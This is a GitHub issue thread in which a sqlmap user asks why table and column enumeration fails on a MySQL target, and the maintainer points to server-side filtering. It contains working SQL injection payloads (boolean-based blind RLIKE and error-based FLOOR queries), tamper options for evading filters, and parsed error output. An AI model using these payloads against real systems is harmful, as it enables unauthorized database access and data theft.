### ISSUE TITLE
Unable to retrieve tables or number of column

### ISSUE THREAD

**Issue by depojones** [sqlmapproject/sqlmap#2361]
updated to the latest revision 'cf18288'

Hi, I can retrieve only the database name and not the table nor columns. The below is the technique used

> Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: quantity=2' RLIKE (SELECT (CASE WHEN (1121=1121) THEN 2 ELSE 0x28 END)) AND 'pCWB'='pCWB&pid=1
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

> Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: quantity=2' AND (SELECT 1658 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(1658=1658,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'LvUI'='LvUI&pid=1
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

--parse-errors would give the following:

> [WARNING] parsed DBMS error message: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/**/AND/**/(SELECT/**/4648/**/FROM(SELECT/**/COUNT(*),CONCAT(0x7162786b71,(MID(' at line 1'

--current-db -> none
--current-user -> none
--banner -> none
--hostname -> none

This is clearly a permission issue, but how come I was able to retrieve the database name. I did inspect the header response by specifying -t traffic, but nothing insightful. 

I will be glad if anyone could give clarity to the issue.

Regards

**Comment by stamparm** [comment]
1) `but how come I was able to retrieve the database name` <- some stuff is blacklisted, some stuff is not blacklisted. That's how the stuff works
2) I am not sure who added `/**/` in query, while in the same time there is also a whitespace replacement with `//`. You should inspect what's going in that department first. Not sqlmap's issue

**Comment by depojones** [comment]
Thanks for your prompt response, I included --tamper=space2comment and no-cast for faster retrieval as suggested.

**Comment by stamparm** [comment]
Obviously you have a problem where server is replacing the `*` from `/**/` in some cases (take a look into your parsed error message)

**Comment by depojones** [comment]
Well, this is all I get from -parse-errors:

> [WARNING] parsed DBMS error message: 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHA' at line 1'

If you claim this is not in anyway sqlmap issue, I will investigate further. Thanks for your comment.

**Comment by stamparm** [comment]
This error message is totally different from the one you've posted at https://github.com/sqlmapproject/sqlmap/issues/2361#issue-201601539. There you have `//AND//(SELECT//4648//FROM(SELECT/**/COUNT(*),CONCAT(0x7162786b71,(MID(' at line 1` while here you state `'' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHA' at line 1`. Anyway, you should inspect what's going on by yourself

**Comment by depojones** [comment]
Thank you.
